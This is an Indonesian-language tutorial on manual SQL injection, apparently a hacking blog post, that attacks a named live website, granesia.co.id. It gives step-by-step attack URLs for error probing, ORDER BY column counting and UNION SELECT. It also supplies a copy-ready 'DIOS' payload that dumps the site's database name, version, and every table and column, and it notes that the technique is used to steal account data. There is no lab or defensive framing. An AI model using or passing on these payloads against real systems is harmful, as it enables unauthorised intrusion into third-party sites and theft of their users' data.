Tutorial SQL Injection Manual.ok kali ini saya akan memberikan tutorial SQL Injection manual ok Kali ini live targetnya adalah ini

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1

Ok lamgsung saja mulai tutornya

[STEP 1]

Pertama kita tambahkan ‘ di parameternya contohnya

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1′

Setelah itu jika tampilan web error’ maka web tersebut vuln terhadap sqli

[STEP 2]

Setelah itu jika web tersebut vuln kita akan mencoba mencari tahu jumlah tablenya dengan menambahkan +order+by+1–+- contoh :

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1’+order+by+1–+-

Maka web akan normal lagi dan tidak ada error lalu kalian lakukan hingga menemukan jumlah tablenya.kalian +order+by+1–+- lalu +order+by+2–+- dan seterusnya hingga web kembali error sebagai contoh disini saat saya order by 5 web tidak error’ tetapi saat saya order by 6 website tersebut error

tidak error

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+5–+-

Error

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+order+by+6–+-

Maka diketahui tablenya ada 5 karena saat kita order by 6 error

[STEP 3]

setelah itu kita lakukan union select untuk menyelect tablenya dan memunculkannya lakukan seperti ini +union+select+jumlah table–+-

Contoh disitu ada 5 table maka lakukan seperti ini

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1’+union+select+1,2,3,4,5–+-

[STEP 4]

Jika sudah maka jika kalian telusuri webnya dari atas sampai kebawah akan ada bagian web yang error’ dan memunculkan suatu angka

Contoh dalam kasus ini muncul angka 4 dan 5 maka kita pilih salah 1 mau angka yang mana jika sudah tinggal kalian hilangkan angka tersebut di union select dan rubah menjadi Dios kalian contoh disini saya memilih angka 4 maka seperti ini +union+select+1,2,3,Dios,5–+-

Contoh:

http://granesia.co.id/index.php?t=kalkulasi&fol=kalkulasi&f=kalkulasi_form&id=1%27+union+select+1,2,3,concat(0x496E6A656374204279203738373061,'<br>’,'<img src =”https://1.bp.blogspot.com/-eyN8qlix3HM/X1N3jkh3RJI/AAAAAAAAAYE/04Okt18xX0MVZNoPUjQvLAbe0oNHiHzHACLcBGAsYHQ/s320/86591478-21a3-47f0-9ad0-1342297e9e6e.jpg” height=”150″ width=”150″><br>’,database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

Baginkalian yang gapunya Dios salin kode Dios saya dibawah ini

concat(0x496E6A656374204279203738373061,'<br>','<img src ="https://1.bp.blogspot.com/-eyN8qlix3HM/X1N3jkh3RJI/AAAAAAAAAYE/04Okt18xX0MVZNoPUjQvLAbe0oNHiHzHACLcBGAsYHQ/s320/86591478-21a3-47f0-9ad0-1342297e9e6e.jpg" height="150" width="150"><br>',database(),version(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

jika sudah maka kita dapat melihat semua database pada website itu.kerentanan ini yang biasanya digunakan hacker untuk mencuri data seperti akun dan lain lain